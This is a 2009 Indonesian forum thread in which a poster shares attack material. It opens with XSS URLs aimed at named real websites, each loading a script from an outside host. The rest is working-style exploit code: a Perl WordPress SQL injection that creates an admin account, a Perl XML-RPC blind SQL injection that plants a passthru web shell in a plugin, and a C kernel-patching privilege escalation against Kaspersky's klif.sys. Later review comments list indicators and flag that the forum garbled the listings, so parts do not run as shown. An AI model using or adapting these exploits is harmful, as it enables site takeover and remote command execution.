www.andrewillemsen.be/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

walden3.kr/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>
Terima Kasih...



Re: Kumpulan Bugs

Post by JokerKliker » Fri Jul 24, 2009 4:41 pm

Waduh, sangar-sangar banget nih...
~~~


Re: Kumpulan Bugs

Post by Digital Cat » Fri Jul 24, 2009 5:14 pm

JokerKliker wrote:Waduh, sangar-sangar banget nih...
gak juga sih..

menurut saya biasa aja..

para master disini lebih hebat ..

saya hanya mencari kelemahan yang mungkin bisa dilakukan itu saja..

Terima Kasih.......



Re: Kumpulan Bugs

Post by Digital Cat » Fri Jul 24, 2009 6:52 pm

WordPress <= 1.5.1.1 "cat_id" Remote SQL Injection Exploit


#!/usr/bin/perl
# WordPress <= 1.5.1.1 "cat_id" SQL-injection PoC as posted (the r57wp.pl
# script named in usage()). Flow: STEP 1 GETs the blog path with a long
# percent-encoded query string and scrapes a login and a 32-hex-character hash
# out of the response; the hash and path are md5'd into wordpressuser_/
# wordpresspass_ cookies; STEP 2 POSTs an adduser form for login "r57" to
# wp-admin/users.php; STEP 3 reads the user list back to find that user's
# numeric id; STEP 4 GETs action=promote&prom=up for that id ten times.
#
# Server-side indicators of this script: a GET to the blog root whose query
# string is one long percent-encoded value; an adduser POST for "r57" with
# the e-mail/uri literals below; ten consecutive promote requests for a single
# id. Upgrading past the affected release is the fix.
#
# NOTE(review): the listing is forum-mangled and does not run as shown — the
# match on $res->content contains ":Roll Eyes" where a smiley was rendered
# (its group parentheses are unbalanced as a result), the backslash-space
# before "@usa.com" and the space before "@res" look like escaping artefacts,
# and the STEP banners have been reflowed across lines. Not repaired here.
use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;
use Digest::MD5 qw(md5_hex);
getopts('h:p:');

$path = $opt_h;
$pref = $opt_p || 'wp_';

if(!$path) { usage(); }

$xpl = LWP::UserAgent->new() or die;
&header();
print " +---

    * STEP 1 - TRY GET ADMIN INFO\n";

# The single-quoted fragments span physical lines, so the embedded newlines
# become part of the request URL as posted.
$reg = $path;
$reg .= '?%63%61%74=%36%36%36%20%75%6E%69%6F%6E%20%73%65%6
C%65%63%74%20%36%36%36%2C%63%6F%6E'.
'%63%61%74%28%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29
%2C%75%73%65%72%5F%6C%6F%67%69'.
'%6E%2C%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29%2C%75
%73%65%72%5F%70%61%73%73%2C%63'.
'%68%61%72%28%35%38%2C%35%38%2C%35%38%29%29%2C%6E%75%6C
%6C%2C%6E%75%6C%6C%2C%6E%75%6C'.
'%6C%20%66%72%6F%6D%20'.$pref.'%75%73%65%72%73%20%57%48%45%
52%45%20%49%44=1'; ### 1 - admin ID
$res = $xpl->get($reg);
die "ERROR : ", $res->status_line unless $res->is_success;
if($res->content =~ m/(?::Roll Eyes(.*)(?::Roll Eyes([a-f0-9]{32})(?::Roll Eyes(<\/title>)/)
{
$login = $1; $hash = $2;
print "\n>> LOGIN : $login\n>> HASH : $hash\n\n";
}
else { print "ERROR : Forum not vulnerable or bad prefix."; exit(); }

# Cookie names are suffixed with md5 of the path (trailing slash stripped);
# the cookie value is md5 of the scraped hash.
$cookie_jar = HTTP::Cookies->new();
($cpath = $path) =~ s!/$!!;
$hash = md5_hex($hash);
($host = $cpath) =~ s!http://([^/]*).*!$1!;
$cpath = md5_hex($cpath);

$xpl->cookie_jar( $cookie_jar );

$cookie_jar->set_cookie( "0","wordpresspass_$cpath","$hash","/",$host,,,,,);
$cookie_jar->set_cookie( "1","wordpressuser_$cpath","$login","/",$host,,,,,);
print " +---

    * STEP 2 - CREATE NEW USER\n";

# Response of the adduser POST is not checked before continuing.
$reg = $path;
$reg .= 'wp-admin/users.php';
$res = $xpl->post("$reg",
{
"action" => "adduser",
"user_login" => "r57",
"firstname" => "RST",
"lastname" => "GHC",
"email" => "digitalcat\ @usa.com",
"uri" => "xcode.or.id",
"pass1" => "r57",
"pass2" => "r57",
"adduser" => "Submit",
},
Referer => $reg
);
print " +---

    * STEP 3 - GET ID OF NEW USER\n";

# Scans the user table rows; keeps the last id cell seen before the row
# whose name cell is "r57". The status check comes after the loop.
$reg = $path;
$reg .= 'wp-admin/users.php';
$res = $xpl->get("$reg",Referer => $reg);
 @res = split(/\n/,$res->content);
$id = 0;
for( @res)
{
if(/(?:\<td align=\'center\'\>)([0-9]*)(?:\<\/td\>)/) { $id = $1; }
if(/\<td\>\<strong\>r57\<\/strong\>\<\/td\>/) { last; }
}
die "ERROR : ", $res->status_line unless $res->is_success;
if($id != 0) { print "\n>> ID : $id\n\n"; }
else { print "[-] ERROR : CAN'T GET NEW USER ID\n"; exit(); }
print " +---

    * STEP 4 - LEVEL UP FOR NEW USER\n\n";

$reg = $path;
$reg .= 'wp-admin/users.php?action=promote&id='.$id.'&prom=up';
for($i=0;$i<10;$i++)
{
print ">> LEVEL UP # $i\n";
$res = $xpl->get("$reg",Referer => $reg);
die "ERROR : ", $res->status_line unless $res->is_success;
}
print "\nTHATS ALL. NOW YOU CAN LOGIN WITH USERNAME 'r57' AND PASSWORD 'r57'\n";

# Prints the banner and option help, then exits. Called when -h is missing.
sub usage()
{
&header();
print "USAGE : r57wp.pl [OPTIONS]\n";
print "\noptions:\n\n";
print "-h [path]\n";
print " Path to wordpress installed\n";
print "-p [prefix] (optional)\n";
print " Database tables prefix (default 'wp_')\n\n";
print "e.g.: r57wp.pl -h http://blah.com/wordpress/\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "(c)oded by digital cat";
print "RST/GHC\n";
print "http://xcode.or.id\n";
exit();
}
# Prints the three-line banner.
sub header()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print " WordPress 1.5.1.1 exploit \n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
}
Terima Kasih.......



Re: Kumpulan Bugs

Post by Digital Cat » Fri Jul 24, 2009 6:58 pm

WordPress 1.5.1.2 XMLRPC Module Remote SQL Injection Exploit


#!/usr/bin/perl -w
# WordPress 1.5.1.2 XML-RPC PoC as posted. Phase 1 probes $host/xmlrpc.php,
# then recovers a 32-character hash one hex digit at a time: each
# pingback.ping call carries a UNION SELECT in its first parameter and the
# "already been registered" reply is used as a yes/no oracle (up to 32 x 16
# requests). Phase 2 turns the result into wordpressuser_/wordpresspass_
# cookies, uses wp-admin/plugin-editor.php to prepend a <cmdout> PHP block to
# a plugin file, activates the plugin, and requests it with ?cmd=$exec.
#
# Defensive indicators: bursts of pingback.ping POSTs whose source URI
# contains SQL; plugin files containing "<cmdout>" or
# passthru($_REQUEST["cmd"]); GETs to plugins.php or wp-content/plugins/*.php
# carrying a cmd parameter. Every failure path dumps the last response to
# wp_out.html in the working directory.
#
# NOTE(review): the listing is forum-mangled — the four s/// lines after
# "my $data = $1" have had their HTML entities decoded and now read as
# no-ops, " @char" / " @cookie" / " @list" carry an extra space, the print
# banners are reflowed across lines, and no open(LOG, ...) is ever closed.
# Not repaired here.
use LWP::UserAgent;
use Digest::MD5 qw(md5_hex);

my $ua = new LWP::UserAgent;
$ua->agent("Wordpress Hash Grabber v1.0" . $ua->agent);

my  @char = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $host = $ARGV[0]; # The path to xmlrpc.php
my $user = $ARGV[1]; # The target login, default wp user is admin
my $post = $ARGV[2]; # Must be a valid pingback or part
my $exec = $ARGV[3]; # Command to execute
my $pref = 'wp_'; # database prefix!
my $hash = '';

# Only the third argument is validated; $host/$user/$exec may be undef.
if ( !$ARGV[2] )
{
die("Im Not Psychic ..\n");
}

print "

    * Trying Host $host ...\n";


my $res = $ua->get($host.'/xmlrpc.php');

if ( $res->content =~ /XML-RPC server accepts POST requests only/is )
{
print "

    * The XMLRPC server seems to be working \n";

}
else
{
print "[!] Something seems to be wrong with the XMLRPC server \n ";
open(LOG, ">wp_out.html"); print LOG $res->content;
exit;
}

# Outer loop: hash position 1..32; inner loop: candidate hex digit.
# $i, $j and $out are file-scope globals (no "my").
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $sql = "<?xml version=\"1.0\"?><methodCall>
<methodName>pingback.ping</methodName>
<params><param><value>
<string>foobar' UNION SELECT 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 FROM " . $pref . "
users WHERE (user_login='$user' AND MID(user_pass,$i,1)='$char[$j]')/*</string>
</value></param><param><value><string>$host/?p=$post#$post</string>
</value></param><param><value><string>admin</string></value>
</param></params></methodCall>";
my $req = new HTTP::Request POST => $host . "/xmlrpc.php";
$req->content($sql);
$res = $ua->request($req);
$out = $res->content;

if ( $out =~ /The pingback has already been registered/)
{
$hash .= $char[$j];
print "

    * Char $i is $char[$j]\n";

last;
}

}

# After each position: bail out if nothing was ever matched, if the post
# lookup failed, or if the reply/hash shape suggests a different schema.
if ( length($hash) < 1 )
{
open(LOG, ">wp_out.html"); print LOG $out;

print "[!] $host not vulnerable? Better verify manually!\n";
exit;
}
if ( $out =~ /<value><int>0<\/int><\/value>/)
{
print "[!] Invalid post information specified! \n";
exit;
}
if ( $out =~ /different number of columns/is || $hash =~ /([0]{5})/ )
{
open(LOG, ">wp_out.html"); print LOG $out;

print "[!] The database structured has been altered, check manually \n";
exit;
}

}

print "

    * Host : $host\n";

print "

    * User : $user\n";

print "

    * Hash : $hash\n";

print "

    * Attempting to create shell .. \n";
# Cookie names are suffixed with md5($host); the password cookie is md5 of
# the recovered hash. Sent as extra headers on every request below.
my $ckey = md5_hex($host);
$hash = md5_hex($hash);

my  @cookie = ('Referer' => $host.'/wp-admin/plugins.php;','Cookie' =>
'wordpressuser_'.$ckey.'='.$user.'; wordpresspass_'.$ckey.'='. $hash);
$res = $ua->get($host.'/wp-admin/plugin-editor.php',  @cookie);

if ( $res->content =~ /<strong>(.*)\.php<\/strong>/i )
{
# First candidate is the file the editor page itself names; the rest are
# stock plugin file names.
my  @list = ($1.'.php', 'hello.php', 'markdown.php', 'textile1.php');
my $file;


foreach $file ( @list)
{

print "

    * Trying filename $file ...\n";

$res = $ua->get($host.'/wp-admin/plugin-editor.php?file='.$file,  @cookie);

if ( $res->content =~ /<textarea[^>]*>(.*)<\/textarea>/is )
{
my $data = $1;

# Intended as HTML-entity decoding of the textarea body; as posted the
# patterns and replacements are identical, so these are no-ops.
$data =~ s/>/>/ig;
$data =~ s/</</ig;
$data =~ s/"/"/ig;
$data =~ s/&/&/ig;

# Skip the prepend if the file already carries a <cmdout> block.
my $add = ( $data =~ /<cmdout>(.*)<\/cmdout>/is ) ? '': '<cmdout>
<?php if ( !empty($_REQUEST["cmd"]) ) passthru($_REQUEST["cmd"]); ?></cmdout>';

$res = $ua->post($host . "/wp-admin/plugin-editor.php",
['newcontent' => $add.$data, 'action' => 'update', 'file' => $file, 'submit' => 'foobar'],  @cookie);

print "

    * Trying to activate $file ... \n";

$res = $ua->get($host.'/wp-admin/plugins.php?action=activate&plugin='.$file ,  @cookie);

print "

    * Trying to execute $exec ... \n";

$res = $ua->get($host.'/wp-admin/plugins.php?cmd='.$exec,  @cookie);

if ( $res->content =~ /<cmdout>(.*)<\/cmdout>/is )
{
# Send results to STDOUT
print "

    * Successfully executed $exec\n\n\n";

print $1;
exit;
}
else
{

print "[!] Couldnt execute command $exec\n";
open(LOG, ">wp_out.html"); print LOG $res->content;

print "[!] Trying to access $file directly!\n";
$res = $ua->get($host.'/wp-content/plugins/'.$file.'?cmd='.$exec,  @cookie);

if ( $res->content =~ /<cmdout>(.*)<\/cmdout>/is )
{
# Send results to STDOUT
print "

    * Successfully executed $exec\n\n\n";

print $1;
exit;
}
else
{

print "[!] Couldnt execute command $exec\n";
print "

    * Try $host/wp-content/plugins/$file manually\n";

}
}
}
else
{

print "[!] Could not read file $file \n";
open(LOG, ">wp_out.html"); print LOG $res->content . $file;
}

}

}
else
{

print "[!] Could Not Get Plugin Information\n";
open(LOG, ">wp_out.html"); print LOG $res->content;
}

exit;
Terima Kasih.......



Re: Kumpulan Bugs

Post by Digital Cat » Fri Jul 24, 2009 7:00 pm

Kaspersky AntiVirus 5.x "klif.sys" Local Privilege Exploit

Advisory : FrSIRT/ADV-2005-0696
Rated as : Moderate Risk


#include <windows.h>

// Fixed addresses used throughout the PoC. The function names and comments
// in this file ascribe them to the klif.sys image of the three KAV builds
// listed in GetKAVRetAddress(); nothing here verifies that at run time.
PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;   // destination for code[]

PDWORD pJmpAddress=(PDWORD)0xBE9372B0; // holds pCodeBase; read by jmp_code's indirect jmp

PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046}; // candidate "retn 4" sites

PUCHAR pKAVRet;                        // site chosen by GetKAVRetAddress(); set in main()


// x86 stub copied to pCodeBase. It uses absolute 0xBE938xxx data addresses
// (the same ones LoadExploitIntoKernelMemory() fills in) and three
// "mov eax,<imm32>" slots whose 0x00000000 immediates — byte offsets 13, 30
// and 58 — are patched at run time with resolved API addresses. The inline
// comments give the intended disassembly.
unsigned char code[]={0x68,0x00,0x02,0x00,0x00, //push 0x200
0x68,0x00,0x80,0x93,0xBE, //push <buffer address> - 0xBE938000
0x6A,0x00, //push 0
0xB8,0x00,0x00,0x00,0x00, //mov eax,<GetModuleFileNameA> -> +13
0xFF,0xD0, //call eax
0x68,0x00,0x80,0x93,0xBE, //push <buffer address>
0x68,0x00,0x82,0x93,0xBE, //push <address of the notepad path>- 0xBE938200
0xB8,0x00,0x00,0x00,0x00, //mov eax,<lstrcmpiA> -> +30
0xFF,0xD0, //call eax
0x85,0xC0, //test eax,eax
0x74,0x03, //je +03
0xC2,0x04,0x00, //retn 4
0x6A,0x00, //push 0
0x68,0x00,0x84,0x93,0xBE, //push <address of the message string>- 0xBE938400
0x68,0x00,0x84,0x93,0xBE, //push <address of the message string>- 0xBE938400
0x6A,0x00, //push 0
0xB8,0x00,0x00,0x00,0x00, //mov eax,<MessageBoxA> -> +58
0xFF,0xD0, //call eax
0xC2,0x04,0x00 //retn 4
};

// 6-byte indirect jump through pJmpAddress. LoadExploitIntoKernelMemory()
// writes it over the selected "retn 4" site; UnloadExploitFromKernelMemory()
// puts the retn 4 back.
unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE};
//jmp dword prt [0xBE9372B0]

//////////////////////////////////////////////////////////////

// Stages the PoC. Resolves GetModuleFileNameA, lstrcmpiA and MessageBoxA and
// patches their addresses into code[] at +13/+30/+58; copies the notepad path
// and the message text to the fixed addresses 0xBE938200 / 0xBE938400; copies
// code[] to pCodeBase; stores pCodeBase at pJmpAddress; finally overwrites
// *pKAVRet with jmp_code. Requires pKAVRet to have been set by
// GetKAVRetAddress() first. Always returns TRUE.
//
// None of GetModuleHandle/GetProcAddress/SearchPath are checked, and the
// lstrcpy/memmove writes to fixed addresses are unguarded: they only succeed
// if those pages are writable from this process — presumably the condition
// the cited advisory describes; not verified here.
BOOLEAN LoadExploitIntoKernelMemory(void){



//Get function's addresses

HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
HANDLE hUser=GetModuleHandle("USER32.DLL");

FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");

FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");

// Patch the three imm32 slots of code[] (see the array's inline comments).
*(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
*(DWORD*)(code+30)=(DWORD)plstrcmpiA;
*(DWORD*)(code+58)=(DWORD)pMessageBoxA;

//Prepare our data into ring0-zone.

PCHAR pNotepadName=(PCHAR)0xBE938200;

char temp_buffer[MAX_PATH];
char *s;

// s receives SearchPath's file-part pointer and is otherwise unused.
SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);

lstrcpy(pNotepadName,temp_buffer);

PCHAR pMessage=(PCHAR)0xBE938400;

lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!");

memmove(pCodeBase,code,sizeof(code));

*pJmpAddress=(DWORD)pCodeBase;

// Last step: redirect the chosen retn-4 site to the staged stub.
memmove(pKAVRet,jmp_code,sizeof(jmp_code));

return TRUE;
}

///////////////////////////////////////////////////////////////

// Restores a "retn 4" (C2 04 00) at *pKAVRet, undoing the jmp_code write
// made by LoadExploitIntoKernelMemory(). Nothing else (code[], the strings,
// pJmpAddress) is reverted.
void UnloadExploitFromKernelMemory(){

UCHAR retn_4[]={0xC2,0x04,0x00};

memmove(pKAVRet,retn_4,sizeof(retn_4));

}

/////////////////////////////////////////////////////////////////

// Looks for a "retn 4" (C2 04 00) at the candidate sites in pKAVRets. An
// access violation while reading is caught by the __except block and reported
// as "KAV is not installed"; no match is reported as a wrong version. Returns
// the matching site, or NULL after showing a message box.
//
// NOTE(review): the loop body never uses i. memcmp() reads the first bytes of
// the pKAVRets pointer table itself, and the return value is the table, not
// an entry — so, as written, the candidate sites are not actually compared.
// Both MessageBox string literals are split across lines in this listing
// (forum reflow); they would not compile as shown.
PUCHAR GetKAVRetAddress(void){

//Check the retn 4 in the KAV 0xBE9334E1 function end
//Also, we check the KAV klif.sys existance.

UCHAR retn_4[]={0xC2,0x04,0x00};

__try{

for(DWORD i=0;i<sizeof(pKAVRets)/sizeof(pKAVRets[0]);i++){

if(memcmp(pKAVRets,retn_4,sizeof(retn_4))==0)
return pKAVRets;

}

}__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,"KAV is
not installed",NULL,0);return NULL;}


MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or
5.0.335 versions of KAV",NULL,0);
return NULL;
}

/////////////////////////////////////////////////////////////////

// Entry point of the PoC: selects the patch site, stages the hook, launches
// notepad.exe (located via SearchPath) and waits for it to exit, shows two
// message boxes, then restores the original bytes. SearchPath and
// CreateProcess return values are not checked, the handles in pi are never
// closed, and "void main" is non-standard (the C standard requires int main).
// The first MessageBox literal is split across lines in this listing (forum
// reflow) and would not compile as shown.
void main(void){

pKAVRet=GetKAVRetAddress();

if(NULL==pKAVRet)
return;


if(!LoadExploitIntoKernelMemory())
return;

char temp_buffer[MAX_PATH];
char *s;

SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);

PROCESS_INFORMATION pi;

STARTUPINFO si={0};
si.cb=sizeof(si);

// Blocks until the launched process exits before showing the next box.
CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,
0,NULL,NULL,&si,&pi);

WaitForSingleObject(pi.hProcess,INFINITE);

MessageBox(NULL,"Now you may start your own Notepad instance to
check this exploit!","KAV_EXPLOITER",0);

MessageBox(NULL,"Close this window to stop exploitation","KAV_EXPLOITER",0);

UnloadExploitFromKernelMemory();
}
Terima Kasih.......

